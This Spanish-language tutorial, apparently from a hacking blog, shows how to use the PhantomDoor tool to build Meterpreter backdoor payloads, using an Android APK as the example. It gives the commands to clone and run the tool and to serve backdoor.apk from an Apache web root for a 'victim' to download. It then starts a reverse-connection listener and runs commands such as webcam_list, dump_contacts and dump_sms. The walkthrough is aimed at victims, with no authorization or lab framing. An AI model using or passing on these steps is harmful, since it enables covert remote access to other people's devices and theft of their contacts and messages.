PhantomDoor es una herramienta escrita en Python que nos permite obtener un sesión meterpreter para Windows, Linux, macOS, Android y web; incrustando un backdoor.
El funcionamiento es sencillo. Iniciamos el script; seleccionamos la plataforma objetivo (Windows, Linux, macOS, Android o web); se crea el archivo backdoor (.exe, .apk, .php, etc.) y se lo debemos pasar al víctima. Luego, abrimos una sesión de escucha esperando una conexión entrante. El resto será historia…
1. PhantomDoor: Backdoor multiplataforma
Su ejecución es sencilla. Descargamos el script y ejecutamos la herramienta:
git clone https://github.com/venom0x16/PhantomDoor
cd PhantomDoor/
chmod +x PhantomDoor.py
./PhantomDoor.pyDespués de arrancar nuestro vehículo, vemos 2 de esas opciones. Entonces, ¿qué son estos?
- (
1) Backdoors (Puerta trasera): en esta sección; Crearemos nuestro virus Backdoor para infiltrarnos en el sistema objetivo. - (
2) Listener (Oyente): en esta parte; Escuchamos la puerta trasera que creamos.
La herramienta en sí misma crea la payload para nosotros, por lo que queda infectar el archivo (exe, apk, etc.), que creamos directamente y sin tener que lidiar con el extra, en la computadora de la víctima.
2. Usar PhantomDoor
Presionamos 1 y continuar.
Ahora en la pantalla que aparece; determinamos qué sistema tiene el sistema que queremos infiltrar y continuamos (usaré Android como ejemplo,es decir la opción 3).
Se nos pedirá el LHOST y LPORT. Coloca cualquier LPORT (por ejemplo, 6666) y recuérdalo -porque si más adelante ingresas diferentes puertos, probablemente dará un error). Para el valor de LHOST abre una nueva Terminal y escribe el comando ifconfig; entonces colocarás tu IP local.
Después de escribir los valores de LHOST y LPORT presionamos la tecla Intro y se creará el archivo Backdoor y lo guardará en el escritorio.
Ahora, de acuerdo con el método que aplicarás, puedes “cambiar el nombre” si lo deseas. Por defecto, me creo el archivo backdoor.apk.
Entonces, después de escribir el código a continuación, copiamos nuestra puerta trasera en el directorio HTML. (estoy creando un servidor local para que la víctima descargue el archivo infectado):
service apache2 start
cp backdoor.apk /var/www/html/Después de ejecutar lo anterior puedes comprobar que el archivo (APK) se ha copiado con éxito en la ruta /var/www/html/. Además, si ingresas a la IP local, ese archivo estará alojado ahí, listo para descargarse.
Backdoor en la víctima
Una vez que la víctima haya descargado el archivo y ejecutado (en mi ejemplo, instalar el APK), debemos iniciar el Oyente (opción 2) con la misma configuración que creamos el backdoor, es decir, mismo LHOST y LPORT.
Y entonces sucederá! Tendremos acceso a la máquina de la víctima a través de Metasploit.
Aquí, podemos ejecutar varios comandos. Por ejemplo:
sysinfo
webcam_list
dump_contacts
dump_smsContenido relacionado:
- RapidPayload: Generador Metasploit Payload
- Cómo Hackear Windows con Metasploit Framework
- 10 herramientas de Prueba de Penetración que usan Profesionales













